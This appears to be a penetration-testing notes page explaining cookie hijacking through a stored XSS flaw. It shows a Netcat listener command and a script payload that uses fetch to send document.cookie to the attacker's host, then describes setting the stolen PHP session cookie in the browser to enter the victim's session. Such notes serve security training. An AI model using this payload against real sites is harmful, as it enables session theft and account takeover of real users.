Cookie Hijacking

When the application is vulnerable to XSS, we could try to hijack cookies such as session tokens that are being stored on the client-side.

Here we find an example of this scenario:

  • In an accessed session we can go to the Inspect>Application>Cookies tab and check the values that are being stored

Example Output
Name               Value                              HttpOnly
...                ...                                ...
PHPIDSESSID        e15df96b271a9729837c2bb206b522c7
...                ...                                ...

  • If the HttpOnly tag is unmarked, indicates that the cookie can interact with JavaScript code

  • PHPIDSESSID is the default session cookie on PHP-handled pages

  • In case we don't see it directly, we can assume that is configured this way and try to get the cookie values directly to our host machine. For this, we set up a listener port with Netcat

nc -nlvp $port

  • We can try to make a cookie hijacking using the Stored XSS vulnerable part

#We fill the form with the payload
<script>fetch("$IP:$port" + document.cookie);</script>
#This will get the information on the cookie values

The $IP and $port values are from our machine and the port opened with Netcat

  • Once we have the cookie value we can go to the website page, go to Inspect>Application>Cookies tab, and set the cookie value manually. After that, we can reload the page to update these values on the browser

Name               Value                             
...                ...                                
PHPIDSESSID        $hijackedCookie     #We set the cookie obtained   
...                ...
#This will log us into the session we stole without the need for credentials
PreviousCross-Site Request ForgeryNextNull Byte Poisoning

Last updated